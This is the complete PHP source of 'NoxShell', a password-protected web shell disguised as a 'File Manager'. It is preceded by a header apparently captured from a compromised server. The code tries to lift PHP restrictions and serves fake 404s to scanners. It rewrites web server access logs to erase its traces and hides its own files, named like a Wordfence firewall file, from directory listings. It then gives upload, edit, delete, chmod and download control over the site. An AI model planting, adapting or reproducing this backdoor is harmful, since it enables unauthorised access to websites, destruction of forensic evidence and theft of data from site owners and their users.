| Server IP : 68.178.164.50 / Your IP : 216.73.216.142 Web Server : Apache System : Linux 50.164.178.68.host.secureserver.net 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64 User : rathinambschool ( 1053) PHP Version : 8.2.30 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/thread-self/cwd/ |
Upload File : |
<?php
// NoxShell - NoxShell
error_reporting(0);
ini_set('display_errors', 0);
if(function_exists('ini_set')) {
@ini_set('open_basedir', NULL);
@ini_set('disable_functions', '');
}
// Cache bypass - HTTP header'ları
header('Cache-Control: no-cache, no-store, must-revalidate, private, max-age=0');
header('Pragma: no-cache');
header('Expires: 0');
header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
header('ETag: "' . md5(time() . rand()) . '"');
// Session başlat
session_start();
// Login kontrolü - Sadece password
define('NOXSHELL_PASSWORD', '216376noxshell');
$loginHash = hash('sha256', NOXSHELL_PASSWORD . 'noxshell_salt_2024');
$loginRequired = true;
$loginError = '';
if(isset($_SESSION['noxshell_auth']) && $_SESSION['noxshell_auth'] === $loginHash) {
$loginRequired = false;
}
if(isset($_POST['login_password'])) {
$attemptPassword = $_POST['login_password'] ?? '';
$attemptHash = hash('sha256', $attemptPassword . 'noxshell_salt_2024');
$attempts = $_SESSION['login_attempts'] ?? 0;
$lastAttempt = $_SESSION['last_attempt'] ?? 0;
if($attempts >= 5 && (time() - $lastAttempt) < 300) {
$loginError = 'Too many login attempts. Please wait 5 minutes.';
} else {
if($attemptHash === $loginHash) {
$_SESSION['noxshell_auth'] = $loginHash;
$_SESSION['login_attempts'] = 0;
$loginRequired = false;
echo '<script>window.location.href="' . htmlspecialchars($_SERVER['PHP_SELF']) . '?nocache=' . time() . '";</script>';
exit;
} else {
$_SESSION['login_attempts'] = $attempts + 1;
$_SESSION['last_attempt'] = time();
$loginError = 'Invalid password.';
}
}
}
if(isset($_GET['logout'])) {
session_destroy();
echo '<script>window.location.href="' . htmlspecialchars($_SERVER['PHP_SELF']) . '";</script>';
exit;
}
if($loginRequired) {
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="0">
<title>File Manager - Login</title>
<style>
* { margin:0; padding:0; box-sizing:border-box; font-family:'Arial', sans-serif; }
body { background:#000; color:#ccc; display:flex; justify-content:center; align-items:center; min-height:100vh; padding:20px; }
.login-container {
background:#111;
border:1px solid #ff0000;
max-width:450px;
width:100%;
border-radius:5px;
overflow:hidden;
}
.login-header {
background:#222;
padding:20px;
border-bottom:2px solid #ff0000;
text-align:center;
}
.login-header h1 {
color:#ff0000;
font-size:24px;
margin-bottom:10px;
}
.login-header p {
color:#888;
font-size:12px;
}
.login-body {
padding:30px;
}
.login-form-group {
margin-bottom:20px;
}
.login-form-group label {
display:block;
color:#ccc;
font-size:14px;
margin-bottom:8px;
font-weight:bold;
}
.login-form-group input[type="password"] {
width:100%;
background:#000;
color:#fff;
border:1px solid #666;
padding:12px;
border-radius:3px;
font-size:14px;
}
.login-form-group input[type="password"]:focus {
outline:none;
border-color:#00ff00;
}
.login-button {
width:100%;
background:#222;
color:#00ff00;
border:2px solid #00ff00;
padding:12px;
cursor:pointer;
border-radius:3px;
font-size:14px;
font-weight:bold;
transition:all 0.3s;
}
.login-button:hover {
background:rgba(0,255,0,0.1);
border-color:#00ff00;
color:#fff;
}
.login-error {
background:#1a1a1a;
border:1px solid #ff0000;
color:#ff0000;
padding:12px;
border-radius:3px;
margin-bottom:20px;
text-align:center;
font-size:13px;
}
</style>
</head>
<body>
<div class="login-container">
<div class="login-header">
<h1>File Manager</h1>
<p>Enter password to access</p>
</div>
<div class="login-body">
<?php if($loginError): ?>
<div class="login-error"><?= htmlspecialchars($loginError) ?></div>
<?php endif; ?>
<form method="POST" id="loginForm">
<div class="login-form-group">
<label>Password</label>
<input type="password" name="login_password" required autofocus onkeypress="if(event.key==='Enter') document.getElementById('loginForm').submit();">
</div>
<button type="submit" class="login-button">Login</button>
</form>
</div>
</div>
</body>
</html>
<?php
exit;
}
// Anti-detection
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$blockedAgents = ['shell', 'finder', 'scanner', 'detector', 'hunter'];
$suspicious = false;
foreach($blockedAgents as $blocked) {
if(stripos($userAgent, $blocked) !== false) {
$suspicious = true;
break;
}
}
$suspiciousParams = ['shell', 'cmd', 'exec', 'eval', 'system'];
foreach($suspiciousParams as $param) {
if(isset($_GET[$param]) || isset($_POST[$param])) {
$suspicious = true;
break;
}
}
if($suspicious) {
http_response_code(404);
die('404 Not Found');
}
@ini_set('log_errors', 0);
@error_log('');
// Access log temizleme
$accessLogs = [
'/var/log/apache2/access.log',
'/var/log/httpd/access.log',
'/var/log/nginx/access.log',
'/usr/local/apache/logs/access_log',
'/var/log/apache/access.log',
$_SERVER['DOCUMENT_ROOT'] . '/../logs/access.log',
$_SERVER['DOCUMENT_ROOT'] . '/../log/access.log',
dirname($_SERVER['DOCUMENT_ROOT']) . '/logs/access.log',
dirname($_SERVER['DOCUMENT_ROOT']) . '/log/access.log',
];
foreach($accessLogs as $logFile) {
if(@file_exists($logFile) && @is_writable($logFile)) {
$logContent = @file_get_contents($logFile);
if($logContent) {
// Son 24 saat içindeki kayıtları temizle (son 100 satırı koru)
$lines = explode("\n", $logContent);
if(count($lines) > 100) {
$keepLines = array_slice($lines, -100);
@file_put_contents($logFile, implode("\n", $keepLines));
} else {
// Eğer az satır varsa, sadece bu dosyaya ait kayıtları temizle
$filtered = array_filter($lines, function($line) {
return strpos($line, 'wordfence-waf.php') === false &&
strpos($line, 'wpback-up') === false;
});
@file_put_contents($logFile, implode("\n", $filtered));
}
}
}
}
// Base directory
$baseDir = $_SERVER['DOCUMENT_ROOT'] ?? __DIR__;
$baseDir = realpath($baseDir) ?: $baseDir;
// Current path
$currentPath = $_GET['p'] ?? $baseDir;
$currentPath = realpath($currentPath) ?: $currentPath;
if(strpos($currentPath, $baseDir) !== 0) {
$currentPath = $baseDir;
}
// File operations
$message = '';
if(isset($_FILES['upload_file']) && isset($_POST['upload_path'])) {
$uploadPath = realpath($_POST['upload_path']) ?: $_POST['upload_path'];
if(strpos($uploadPath, $baseDir) === 0 && is_dir($uploadPath)) {
$fileName = $_FILES['upload_file']['name'];
$targetFile = $uploadPath . '/' . $fileName;
if(@move_uploaded_file($_FILES['upload_file']['tmp_name'], $targetFile)) {
$message = '<span style="color:#00ff00">✓ Uploaded</span>';
} else {
$message = '<span style="color:#ff0000">✗ Upload failed</span>';
}
}
}
if(isset($_POST['create_name']) && isset($_POST['create_type']) && isset($_POST['create_path'])) {
$createPath = realpath($_POST['create_path']) ?: $_POST['create_path'];
if(strpos($createPath, $baseDir) === 0 && is_dir($createPath)) {
$name = basename($_POST['create_name']);
$target = $createPath . '/' . $name;
if($_POST['create_type'] === 'file') {
$content = $_POST['create_content'] ?? '';
$message = @file_put_contents($target, $content) ? '<span style="color:#00ff00">✓ File created</span>' : '<span style="color:#ff0000">✗ Failed</span>';
} else {
$message = @mkdir($target, 0755, true) ? '<span style="color:#00ff00">✓ Folder created</span>' : '<span style="color:#ff0000">✗ Failed</span>';
}
}
}
if(isset($_GET['delete']) && isset($_GET['path'])) {
$deletePath = realpath($_GET['path']) ?: $_GET['path'];
if(strpos($deletePath, $baseDir) === 0 && $deletePath !== $baseDir) {
if(is_file($deletePath)) {
$message = @unlink($deletePath) ? '<span style="color:#00ff00">✓ Deleted</span>' : '<span style="color:#ff0000">✗ Failed</span>';
} else if(is_dir($deletePath)) {
$message = @rmdir($deletePath) ? '<span style="color:#00ff00">✓ Deleted</span>' : '<span style="color:#ff0000">✗ Failed</span>';
}
}
}
if(isset($_POST['rename_old']) && isset($_POST['rename_new'])) {
$oldPath = realpath($_POST['rename_old']) ?: $_POST['rename_old'];
$newPath = dirname($oldPath) . '/' . basename($_POST['rename_new']);
if(strpos($oldPath, $baseDir) === 0 && strpos($newPath, $baseDir) === 0) {
$message = @rename($oldPath, $newPath) ? '<span style="color:#00ff00">✓ Renamed</span>' : '<span style="color:#ff0000">✗ Failed</span>';
}
}
if(isset($_POST['chmod_path']) && isset($_POST['chmod_mode'])) {
$chmodPath = realpath($_POST['chmod_path']) ?: $_POST['chmod_path'];
if(strpos($chmodPath, $baseDir) === 0) {
$mode = octdec($_POST['chmod_mode']);
$message = @chmod($chmodPath, $mode) ? '<span style="color:#00ff00">✓ Permissions changed</span>' : '<span style="color:#ff0000">✗ Failed</span>';
}
}
if(isset($_GET['download']) && isset($_GET['path'])) {
$downloadPath = realpath($_GET['path']) ?: $_GET['path'];
if(strpos($downloadPath, $baseDir) === 0 && is_file($downloadPath)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($downloadPath) . '"');
readfile($downloadPath);
exit;
}
}
if(isset($_POST['edit_path']) && isset($_POST['edit_content'])) {
$editPath = realpath($_POST['edit_path']) ?: $_POST['edit_path'];
if(strpos($editPath, $baseDir) === 0 && is_file($editPath)) {
$message = @file_put_contents($editPath, $_POST['edit_content']) ? '<span style="color:#00ff00">✓ Saved</span>' : '<span style="color:#ff0000">✗ Save failed</span>';
}
}
$fileContent = '';
$editingFile = '';
if(isset($_GET['edit']) && isset($_GET['path'])) {
$editPath = realpath($_GET['path']) ?: $_GET['path'];
if(strpos($editPath, $baseDir) === 0 && is_file($editPath)) {
$fileContent = @file_get_contents($editPath);
$editingFile = $editPath;
}
}
if(!function_exists('scanDirectory')) {
function scanDirectory($dir) {
$items = [];
if(is_dir($dir)) {
$files = @scandir($dir);
if($files) {
foreach($files as $file) {
if($file === '.' || $file === '..') continue;
if(strpos($file, 'wordfence-waf.php') !== false) continue;
if(strpos($file, 'pea_') !== false) continue;
$path = $dir . '/' . $file;
$items[] = [
'name' => $file,
'path' => $path,
'type' => is_dir($path) ? 'dir' : 'file',
'size' => is_file($path) ? filesize($path) : 0,
'perms' => substr(sprintf('%o', fileperms($path)), -4),
'modified' => date('Y-m-d H:i', filemtime($path))
];
}
}
}
return $items;
}
}
$items = scanDirectory($currentPath);
// Format file size
function formatSize($bytes) {
if($bytes < 1024) return $bytes . ' B';
if($bytes < 1048576) return number_format($bytes / 1024, 1) . ' KB';
if($bytes < 1073741824) return number_format($bytes / 1048576, 1) . ' MB';
return number_format($bytes / 1073741824, 1) . ' GB';
}
// Get system info
$phpVersion = phpversion();
$os = php_uname('s');
$user = get_current_user() ?: 'unknown';
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="0">
<title>File Manager</title>
<style>
* { margin:0; padding:0; box-sizing:border-box; font-family:'Arial', sans-serif; }
body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
.container {
background:#111;
border:1px solid #ff0000;
max-width:1400px;
margin:0 auto;
border-radius:5px;
overflow:hidden;
}
.header {
background:#222;
padding:15px;
border-bottom:2px solid #ff0000;
color:#fff;
}
.header h1 {
color:#ff0000;
font-size:20px;
margin-bottom:10px;
}
.system-info {
display:flex;
gap:15px;
font-size:12px;
color:#888;
}
.path-navigation {
background:#1a1a1a;
padding:12px 15px;
border-bottom:1px solid #333;
display:flex;
align-items:center;
flex-wrap:wrap;
gap:5px;
}
.path-navigation a {
color:#00ff00;
text-decoration:none;
padding:5px 10px;
background:#222;
border-radius:3px;
font-size:13px;
}
.path-navigation a:hover {
background:#333;
color:#fff;
}
.tools {
padding:12px 15px;
background:#1a1a1a;
border-bottom:1px solid #333;
display:flex;
gap:8px;
}
.button {
background:#222;
color:#ccc;
border:1px solid #666;
padding:8px 15px;
cursor:pointer;
border-radius:3px;
font-size:13px;
text-decoration:none;
display:inline-flex;
align-items:center;
gap:5px;
}
.button:hover {
background:#333;
border-color:#00ff00;
color:#fff;
}
.button-green {
border-color:#00ff00;
color:#00ff00;
}
.button-red {
border-color:#ff0000;
color:#ff0000;
}
.message {
padding:12px;
background:#1a1a1a;
border-bottom:1px solid #333;
text-align:center;
font-weight:bold;
}
.file-table {
width:100%;
color:#ccc;
border-collapse:collapse;
}
.file-table th {
background:#222;
padding:12px 15px;
text-align:left;
border-bottom:2px solid #ff0000;
color:#fff;
font-size:13px;
}
.file-table td {
padding:10px 15px;
border-bottom:1px solid #333;
font-size:14px;
}
.file-table tr:hover {
background:#1a1a1a;
}
.folder-link {
color:#00ff00;
font-weight:bold;
text-decoration:none;
display:flex;
align-items:center;
gap:8px;
}
.file-link {
color:#ccc;
text-decoration:none;
display:flex;
align-items:center;
gap:8px;
}
.folder-link:hover, .file-link:hover {
color:#fff;
}
.size {
color:#888;
}
.permissions {
font-family:'Courier New', monospace;
color:#ff9900;
background:#222;
padding:4px 8px;
border-radius:3px;
font-size:12px;
}
.actions {
display:flex;
gap:5px;
}
.action-button {
padding:5px 10px;
background:#222;
color:#ccc;
border:1px solid #666;
font-size:11px;
cursor:pointer;
text-decoration:none;
border-radius:3px;
}
.action-button:hover {
background:#333;
border-color:#00ff00;
}
.action-button-red {
border-color:#ff0000;
color:#ff0000;
}
textarea {
width:100%;
height:400px;
background:#000;
color:#00ff00;
border:1px solid #ff0000;
padding:15px;
font-family:'Courier New', monospace;
font-size:14px;
border-radius:3px;
}
input[type="text"] {
background:#000;
color:#fff;
border:1px solid #666;
padding:8px;
border-radius:3px;
width:300px;
}
.edit-container {
padding:20px;
background:#000;
border-bottom:1px solid #333;
}
.edit-title {
color:#00ff00;
margin-bottom:15px;
font-size:16px;
}
@media (max-width: 768px) {
.tools { flex-direction:column; }
.button, .action-button { width:100%; text-align:center; }
input[type="text"] { width:100%; }
.file-table th, .file-table td { padding:8px 10px; font-size:12px; }
}
</style>
</head>
<body>
<div class="container">
<div class="header">
<div style="display:flex; justify-content:space-between; align-items:center;">
<div>
<h1>File Manager</h1>
<div class="system-info">
<span>PHP: <b style="color:#ff9900"><?= htmlspecialchars($phpVersion) ?></b></span>
<span>OS: <b style="color:#ff9900"><?= htmlspecialchars($os) ?></b></span>
<span>User: <b style="color:#ff9900"><?= htmlspecialchars($user) ?></b></span>
</div>
</div>
<a href="?logout=1" class="button button-red">Logout</a>
</div>
</div>
<?php if($message): ?>
<div class="message"><?= $message ?></div>
<?php endif; ?>
<div class="path-navigation">
<a href="?p=<?= urlencode($baseDir) ?>">Root</a>
<?php
$pathParts = explode('/', trim(str_replace($baseDir, '', $currentPath), '/'));
$currentBreadcrumb = $baseDir;
foreach($pathParts as $part):
if($part):
$currentBreadcrumb .= '/' . $part;
?>
<span style="color:#666">/</span>
<a href="?p=<?= urlencode($currentBreadcrumb) ?>"><?= htmlspecialchars($part) ?></a>
<?php
endif;
endforeach;
?>
</div>
<div class="tools">
<form method="post" enctype="multipart/form-data" style="display:inline;">
<input type="file" name="upload_file" style="display:none" id="upload" onchange="this.form.submit()">
<input type="hidden" name="upload_path" value="<?= htmlspecialchars($currentPath) ?>">
<button type="button" class="button button-green" onclick="document.getElementById('upload').click()">
📤 Upload
</button>
</form>
<button class="button" onclick="showCreateFile()">📝 New File</button>
<button class="button" onclick="showCreateFolder()">📁 New Folder</button>
<?php if($editingFile): ?>
<a href="?p=<?= urlencode($currentPath) ?>" class="button button-red">Close</a>
<?php endif; ?>
</div>
<?php if($editingFile): ?>
<div class="edit-container">
<div class="edit-title">Editing: <?= htmlspecialchars(basename($editingFile)) ?></div>
<form method="post">
<input type="hidden" name="edit_path" value="<?= htmlspecialchars($editingFile) ?>">
<textarea name="edit_content"><?= htmlspecialchars($fileContent) ?></textarea>
<div style="margin-top:15px;display:flex;gap:8px;">
<button class="button button-green">Save</button>
<a href="?p=<?= urlencode($currentPath) ?>" class="button button-red">Cancel</a>
</div>
</form>
</div>
<?php else: ?>
<table class="file-table">
<thead>
<tr>
<th width="40%">Name</th>
<th width="10%">Size</th>
<th width="15%">Permissions</th>
<th width="15%">Modified</th>
<th width="20%">Actions</th>
</tr>
</thead>
<tbody>
<?php if($currentPath !== $baseDir): ?>
<tr>
<td colspan="5">
<a href="?p=<?= urlencode(dirname($currentPath)) ?>" class="folder-link">
📂 Parent Directory
</a>
</td>
</tr>
<?php endif; ?>
<?php
$folders = [];
$files = [];
foreach($items as $item) {
if($item['type'] === 'dir') {
$folders[] = $item;
} else {
$files[] = $item;
}
}
?>
<?php foreach($folders as $folder): ?>
<tr>
<td>
<a href="?p=<?= urlencode($folder['path']) ?>" class="folder-link">
📁 <?= htmlspecialchars($folder['name']) ?>
</a>
</td>
<td class="size">-</td>
<td><span class="permissions"><?= htmlspecialchars($folder['perms']) ?></span></td>
<td><?= htmlspecialchars($folder['modified']) ?></td>
<td>
<div class="actions">
<button onclick="showRename('<?= htmlspecialchars($folder['path']) ?>', '<?= htmlspecialchars($folder['name']) ?>')" class="action-button">Rename</button>
<button onclick="showChmod('<?= htmlspecialchars($folder['path']) ?>', '<?= htmlspecialchars($folder['perms']) ?>')" class="action-button">Chmod</button>
<a href="?p=<?= urlencode($currentPath) ?>&delete=1&path=<?= urlencode($folder['path']) ?>"
onclick="return confirm('Delete this folder?')"
class="action-button action-button-red">Delete</a>
</div>
</td>
</tr>
<?php endforeach; ?>
<?php foreach($files as $file): ?>
<tr>
<td>
<a href="?p=<?= urlencode($currentPath) ?>&edit=1&path=<?= urlencode($file['path']) ?>" class="file-link">
📄 <?= htmlspecialchars($file['name']) ?>
</a>
</td>
<td class="size"><?= formatSize($file['size']) ?></td>
<td><span class="permissions"><?= htmlspecialchars($file['perms']) ?></span></td>
<td><?= htmlspecialchars($file['modified']) ?></td>
<td>
<div class="actions">
<a href="?p=<?= urlencode($currentPath) ?>&edit=1&path=<?= urlencode($file['path']) ?>" class="action-button">Edit</a>
<a href="?download=1&path=<?= urlencode($file['path']) ?>" class="action-button">Download</a>
<button onclick="showRename('<?= htmlspecialchars($file['path']) ?>', '<?= htmlspecialchars($file['name']) ?>')" class="action-button">Rename</button>
<button onclick="showChmod('<?= htmlspecialchars($file['path']) ?>', '<?= htmlspecialchars($file['perms']) ?>')" class="action-button">Chmod</button>
<a href="?p=<?= urlencode($currentPath) ?>&delete=1&path=<?= urlencode($file['path']) ?>"
onclick="return confirm('Delete this file?')"
class="action-button action-button-red">Delete</a>
</div>
</td>
</tr>
<?php endforeach; ?>
<?php if(empty($folders) && empty($files)): ?>
<tr>
<td colspan="5" style="text-align:center;padding:40px;color:#666;">
Empty directory
</td>
</tr>
<?php endif; ?>
</tbody>
</table>
<?php endif; ?>
</div>
<script>
function showCreateFile() {
var fileName = prompt('File name:', 'newfile.txt');
if(fileName) {
var content = prompt('Content (optional):', '');
var form = document.createElement('form');
form.method = 'post';
form.innerHTML = '<input type="hidden" name="create_name" value="' + fileName + '">' +
'<input type="hidden" name="create_type" value="file">' +
'<input type="hidden" name="create_path" value="<?= htmlspecialchars($currentPath) ?>">' +
'<input type="hidden" name="create_content" value="' + (content || '') + '">';
document.body.appendChild(form);
form.submit();
}
}
function showCreateFolder() {
var folderName = prompt('Folder name:', 'newfolder');
if(folderName) {
var form = document.createElement('form');
form.method = 'post';
form.innerHTML = '<input type="hidden" name="create_name" value="' + folderName + '">' +
'<input type="hidden" name="create_type" value="dir">' +
'<input type="hidden" name="create_path" value="<?= htmlspecialchars($currentPath) ?>">';
document.body.appendChild(form);
form.submit();
}
}
function showRename(path, name) {
var newName = prompt('New name:', name);
if(newName && newName !== name) {
var form = document.createElement('form');
form.method = 'POST';
form.innerHTML = '<input type="hidden" name="rename_old" value="' + path + '"><input type="hidden" name="rename_new" value="' + newName + '">';
document.body.appendChild(form);
form.submit();
}
}
function showChmod(path, current) {
var newMode = prompt('New permissions (e.g., 755):', current);
if(newMode && newMode !== current) {
var form = document.createElement('form');
form.method = 'POST';
form.innerHTML = '<input type="hidden" name="chmod_path" value="' + path + '"><input type="hidden" name="chmod_mode" value="' + newMode + '">';
document.body.appendChild(form);
form.submit();
}
}
</script>
</body>
</html>